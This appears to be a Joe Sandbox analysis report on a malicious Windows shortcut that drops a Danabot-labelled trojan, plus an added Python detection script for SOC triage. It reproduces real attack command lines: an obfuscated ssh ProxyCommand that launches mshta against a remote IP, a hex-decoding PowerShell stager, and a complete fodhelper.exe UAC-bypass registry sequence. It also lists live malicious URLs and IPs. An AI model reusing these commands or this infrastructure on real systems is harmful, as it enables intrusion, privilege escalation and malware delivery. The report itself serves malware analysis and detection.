          Source: mama.exe, 0000002E.00000002.2524074024.000000000085E000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3s@
          Source: powershell.exe, 00000010.00000002.1651729301.000001A5BC7C6000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: mshta.exe, 00000009.00000003.1670028016.000001FC4D729000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D72A000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAWP
          Source: svchost.exe, 0000000E.00000002.2527759568.000001FA6A22B000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW0
          Source: mshta.exe, 00000009.00000003.1669958089.000001FC4D7B6000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\H
          Source: mshta.exe, 00000009.00000003.1671405780.000001FC4D7A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695655072.000001FC4D7A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1687604862.000001FC4D7A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D7A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D754000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2534493555.000001FA6F85A000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
          Source: mama.exe, 0000002E.00000003.1698273244.00000000008BC000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: mama.exe, 0000002E.00000003.1698273244.00000000008BC000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
          Source: powershell.exe, 00000010.00000002.1651729301.000001A5BC770000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW34%SystemRoot%\system32\mswsock.dllF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C
          Source: ssh.exe, 00000001.00000002.1704084897.00000284BCAA9000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS
          Source: C:\Users\user\AppData\Roaming\mama.exe  API call chain: ExitProcess graph end node  graph_46-2508
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\mama.exe  Code function: 46_2_03525340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,46_2_03525340
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug  (4 occurrences)
          Source: C:\Windows\System32\OpenSSH\ssh.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLf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 to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nop
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exe  Process created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
          Source: C:\Users\user\AppData\Roaming\mama.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command '|\|abh4q3w|fyzxmshta https://150.241.97.10/aaa.mp4|\|abh4q3w|fyzx'.substring(15, 35)" .
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kylfe($jfvkn){return -split ($jfvkn -replace '..', '0x$& ')};$ggul = kylfe('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
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kylfe($jfvkn){return -split ($jfvkn -replace '..', '0x$& ')};$ggul = kylfe('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 to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "reg add hkey_current_user\software\classes\servicehostxgrt\shell\open\command /ve /t reg_sz /d "%tmp%\r.bat" /f && reg add hkey_current_user\software\classes\ms-settings\curver /ve /t reg_sz /d "servicehostxgrt" /f && fodhelper.exe"Jump to behavior
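Detection logic for the chain recorded above, as an added example that is not part of the Joe Sandbox report and not the sample's own code. It turns the report's process-creation rows into checks a SOC would run over an EDR or Sysmon Event ID 1 feed: the fodhelper.exe UAC bypass (a custom ProgID under HKCU\Software\Classes with a Shell\Open\Command, then ms-settings\CurVer repointed at it, so the auto-elevated fodhelper.exe runs the payload), fodhelper.exe spawning a shell, the ssh.exe ProxyCommand launcher whose real command is hidden inside a '<decoy>'.substring(15, 35) expression, mshta fetching a remote URL, and the REG DELETE cleanup that removes the keys again. Assumptions: the (parent, image, cmdline) event shape is a normalisation of whatever the telemetry source supplies; the rule names, the direct-write variant event, the benign control event and the hex input to the stub decoder are constructed for this example; the first four sample events are transcribed from the report.

```python
"""Triage checks for the process chain this report records.

Added example, not code from the Joe Sandbox report or from the sample.
Event shape (parent, image, cmdline) is an assumed normalisation of
Sysmon Event ID 1 / EDR fields; rule names are this example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    parent: str   # image path of the creating process ("unknown" if not logged)
    image: str    # image path of the created process
    cmdline: str  # full command line as logged


# fodhelper.exe auto-elevates and resolves the ms-settings: handler through
# HKCU, so no admin rights are needed to redirect it. The sample plants a
# custom ProgID and points ms-settings\CurVer at it; the other common variant
# writes ms-settings\Shell\Open\Command directly.
_HKCU_CLASSES = r'hk(?:cu|ey_current_user)\\software\\classes\\'
_PROGID_CMD = re.compile(_HKCU_CLASSES + r'([^\\\s"]+)\\shell\\open\\command'
                         r'\s+/ve\s+/t\s+reg_sz\s+/d\s+"([^"]+)"', re.I)
_CURVER = re.compile(_HKCU_CLASSES + r'ms-settings\\curver'
                     r'\s+/ve\s+/t\s+reg_sz\s+/d\s+"([^"]+)"', re.I)
_DIRECT = re.compile(_HKCU_CLASSES + r'ms-settings\\shell\\open\\command'
                     r'(?:\s+/ve)?\s+/t\s+reg_sz\s+/d\s+"([^"]*)"', re.I)
_CLEANUP = re.compile(r'reg(?:\.exe)?\s+delete\s+"?' + _HKCU_CLASSES + r'ms-settings', re.I)
_SUBSTR = re.compile(r"'([^']*)'\.substring\((\d+),\s*(\d+)\)", re.I)


def hijack_chain(cmdline: str) -> Optional[Tuple[str, str]]:
    """(progid, payload) if the command line redirects ms-settings: to an
    attacker-controlled Shell\\Open\\Command, else None."""
    direct = _DIRECT.search(cmdline)
    if direct:
        return ("ms-settings", direct.group(1))
    progids = {m.group(1).lower(): m.group(2) for m in _PROGID_CMD.finditer(cmdline)}
    cur = _CURVER.search(cmdline)
    if cur and cur.group(1).lower() in progids:
        return (cur.group(1), progids[cur.group(1).lower()])
    return None


def unwrap_substring(cmdline: str) -> Optional[str]:
    """Evaluate the '<decoy>'.substring(start, length) wrapper from the ssh.exe
    ProxyCommand. .NET Substring takes a length, not an end index."""
    m = _SUBSTR.search(cmdline)
    if not m:
        return None
    text, start, length = m.group(1), int(m.group(2)), int(m.group(3))
    return text[start:start + length]


def decode_hex_stub(hex_text: str) -> bytes:
    """Reverse the PowerShell stub `-split ($s -replace '..', '0x$& ')`, which
    turns a hex string into 0xNN tokens, i.e. the payload bytes. The real
    payload is elided in the report, so callers supply their own hex."""
    return bytes.fromhex(hex_text)


def triage(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Run every check over every event; returns (rule, detail) pairs in order."""
    findings = []
    for ev in events:
        chain = hijack_chain(ev.cmdline)
        if chain:
            findings.append(("MSSETTINGS_HIJACK", "%s -> %s" % chain))
        if ev.parent.lower().endswith("\\fodhelper.exe"):
            # fodhelper.exe has no legitimate reason to spawn a shell
            findings.append(("FODHELPER_CHILD", ev.image))
        if ev.image.lower().endswith("\\ssh.exe") and re.search(r"proxycommand\s*=", ev.cmdline, re.I):
            findings.append(("SSH_PROXYCOMMAND", unwrap_substring(ev.cmdline) or ev.cmdline))
        if re.search(r"mshta\s+https?://", ev.cmdline, re.I):
            findings.append(("MSHTA_REMOTE_URL", ev.image))
        if _CLEANUP.search(ev.cmdline):
            findings.append(("MSSETTINGS_CLEANUP", ev.image))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# First four events are transcribed from the report; the last two are constructed.
SAMPLE_EVENTS = [
    ProcEvent(PS, CMD, r'"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"'),
    ProcEvent(r"C:\Windows\System32\fodhelper.exe", CMD,
              r'C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "'),
    ProcEvent("unknown", r"C:\Windows\System32\OpenSSH\ssh.exe",
              r'''"c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command '|\|abh4q3w|fyzxmshta https://150.241.97.10/aaa.mp4|\|abh4q3w|fyzx'.substring(15, 35)" .'''),
    ProcEvent(PS, CMD, r'"C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"'),
    ProcEvent(CMD, r"C:\Windows\System32\reg.exe",  # constructed: direct-write variant
              r'reg add HKCU\Software\Classes\ms-settings\Shell\Open\Command /ve /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\payload.exe" /f'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # constructed: benign
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(rule, detail)
```

Two practical points follow from the rows. Both keys live under HKCU, so the bypass needs no privileges beyond the user's, and the REG DELETE rows show the keys are removed within seconds; a registry check after the fact will usually come back clean, so alert on the write (Sysmon Event ID 13 on HKCU\Software\Classes\ms-settings\*) and on fodhelper.exe having any child process rather than on the key's presence. The .substring(15, 35) wrapper hides nothing from a command-line regex, but evaluating it, as unwrap_substring does, is what gives the analyst the exact mshta URL to block.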
Source: mama.exe, 0000002E.00000003.1674843230.000000007E870000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWndTrayNotifyWndSysPagerToolbarWindow32U
Source: mama.exe, 0000002E.00000003.1674843230.000000007E870000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: explorer.exeShell_TrayWnd
Source: C:\Users\user\AppData\Roaming\mama.exe | Code function: GetUserDefaultUILanguage,GetLocaleInfoW,46_2_0306E2C8
Source: C:\Users\user\AppData\Roaming\mama.exe | Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,46_2_0306D768
Source: C:\Users\user\AppData\Roaming\mama.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (15 queries)
Source: C:\Users\user\AppData\Roaming\mama.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 (8 queries)
Source: C:\Users\user\AppData\Roaming\mama.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\AppData\Roaming\mama.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (21 queries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (4 queries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (4 queries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (7 queries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (3 queries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 queries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 queries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation (2 queries)
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation (2 queries)
Source: C:\Users\user\AppData\Roaming\mama.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\mama.exe | Code function: 46_2_03525920 GetVersionExW,GetVersionExW,LoadLibraryW,46_2_03525920
Source: C:\Windows\System32\OpenSSH\ssh.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mama.exe PID: 1532, type: MEMORYSTR
Source: Yara match | File source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mama.exe PID: 1532, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mama.exe PID: 1532, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques with signature hits; the bracketed figure is the hit badge exactly as the report prints it)

Reconnaissance: no hits
Resource Development: Scripting [1]
Initial Access: no hits
Execution: Windows Management Instrumentation [1], Command and Scripting Interpreter [12], Native API [1], PowerShell [2]
Persistence: Scripting [1], DLL Side-Loading [1]
Privilege Escalation: Process Injection [12], DLL Side-Loading [1]
Defense Evasion: Masquerading [11], Modify Registry [1], Virtualization/Sandbox Evasion [131], Process Injection [12], DLL Side-Loading [1]
Credential Access: no hits
Discovery: Security Software Discovery [211], Process Discovery [12], Virtualization/Sandbox Evasion [131], Application Window Discovery [1], File and Directory Discovery [3], System Information Discovery [165]
Lateral Movement: no hits
Collection: Email Collection [1], Archive Collected Data [1]
Command and Control: Encrypted Channel [11], Ingress Tool Transfer [1], Multi-hop Proxy [1], Non-Application Layer Protocol [2], Application Layer Protocol [13], Proxy [1]
Exfiltration: no hits
Impact: no hits
Behavior Graph (ID 1581248, sample A4FY1OA97K.lnk, start date 27/12/2024, architecture WINDOWS, score 100)

Contacted hosts: pravo-bashkortostan.ru (150.241.97.10, port 443, local ports 49699 and 49719, AS TECNALIAES, Spain), x1.i.lencr.org, bg.microsoft.map.fastly.net; svchost.exe additionally talks to 127.0.0.1.
Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Windows shortcut file (LNK) starts blacklisted processes; 9 other signatures.

Process chain as drawn in the graph:
ssh.exe (from the LNK; also starts conhost.exe)
  -> powershell.exe (Powershell drops PE file)
    -> powershell.exe
      -> mshta.exe (contacts pravo-bashkortostan.ru 150.241.97.10:443; Suspicious powershell command line found)
        -> powershell.exe (drops C:\Users\user\AppData\Roaming\mama.exe, PE32, and C:\Users\user\AppData\Local\Temp\r.bat, ASCII)
          -> cmd.exe x3 and 3 other processes
            cmd.exe (Uses cmd line tools excessively to alter registry or file data) -> fodhelper.exe, reg.exe x2 (per cmd.exe instance)
            other processes -> AcroCEF.exe -> AcroCEF.exe
            fodhelper.exe (Windows shortcut file (LNK) starts blacklisted processes) -> cmd.exe (+ conhost.exe) -> cmd.exe (+ conhost.exe) -> conhost.exe

Antivirus detection, submitted sample
Source | Detection | Scanner | Label
A4FY1OA97K.lnk | 42% | Virustotal | (browse)
A4FY1OA97K.lnk | 34% | ReversingLabs | Shortcut.Trojan.Pantera
A4FY1OA97K.lnk | 100% | Joe Sandbox ML |

Antivirus detection, dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\mama.exe | 100% | Avira | TR/ATRAPS.Gen
C:\Users\user\AppData\Roaming\mama.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\mama.exe | 71% | ReversingLabs | Win32.Trojan.Danabot

No Antivirus matches
No Antivirus matches

URL strings scanned by Avira URL Cloud (every entry 0%, verdict "safe"; most are truncated or garbled copies of the three real URLs recovered from process memory):
https://150.241.97.10/aaa.mp4zL
https://150.241.97.10/aaa.mp4;
https://150.241.97.10/aaa.mp4https://150.241.97.10/aaa.mp4
https://pravo-bashkortostan.ru/mama.exeu
https://150.241.97.10/aaa.mp4E
https://pravo-bashkortostan.ru/ggg.pdfp
https://150.241.97.10/aaa.mp4$global:?
http://www.aiim.org/pdfua/ns/id/
https://pravo-bashkortostan.ru/ggg.pdf
https://150.241.97.10/aaa.mp4H
https://150.241.97.10/aaa.mp4ndow
https://150.241.97.10/aaa.mp4-1-0
https://150.241.97.10/aaa.mp4m32;C:
https://150.241.
https://150.241.97.10/aaa.mp4PCU
https://150.241.97.10/aaa.mp4lePa
https://150.241
https://pravo-bashkortostan.ru
https://150.241.X
https://150.241.97.10/aaa.mp4...
https://150.241.97.10/aaa.mp4...X7o(
https://150.241.97.10/aaa.mp46)g
https://150.241.97.10/
https://150.241.97.10/aaa.mp41-0
https://pravo-bashkortostan.ru/mama.exe
http://pravo-bashkortostan.ru
https://150.241.97.10/L
https://150.241.97.10/aaa.mp4C:
https://150.241.97.10/aaa.mp4cL
https://150.241.97.10/aaa.mp4U
https://150.241.97.10/aaa.mp4
https://150.241.97.10/aaa.mp4p
https://150.241.97.10/aaa.mp4g
https://150.241.97.10/aaa.mp4l
Name                         IP               Active   Malicious  Antivirus Detection  Reputation
bg.microsoft.map.fastly.net  199.232.214.172  true     false                           high
pravo-bashkortostan.ru       150.241.97.10    true     true                            unknown
x1.i.lencr.org               unknown          unknown  false                           high
Name                                     Malicious  Antivirus Detection    Reputation
https://pravo-bashkortostan.ru/ggg.pdf   true       Avira URL Cloud: safe  unknown
https://pravo-bashkortostan.ru/mama.exe  true       Avira URL Cloud: safe  unknown
https://150.241.97.10/aaa.mp4            true       Avira URL Cloud: safe  unknown
IP               Domain                  Country        ASN     ASN Name                                             Malicious
188.132.183.159  unknown                 Turkey         42910   PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR  true
206.206.125.221  unknown                 United States  13332   HYPEENT-SJUS                                         true
94.131.118.216   unknown                 Ukraine        29632   NASSIST-ASGI                                         true
150.241.97.10    pravo-bashkortostan.ru  Spain          207714  TECNALIAES                                           true
                                                              IP
                                                              127.0.0.1
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1581248
                                                              Start date and time:2024-12-27 09:04:10 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 8m 7s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:56
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:A4FY1OA97K.lnk
                                                              renamed because original name is a hash value
                                                              Original Sample Name:0306addb386436ae663da152bee03226.lnk
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winLNK@79/70@3/5
                                                              EGA Information:
                                                              • Successful, ratio: 25%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .lnk
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
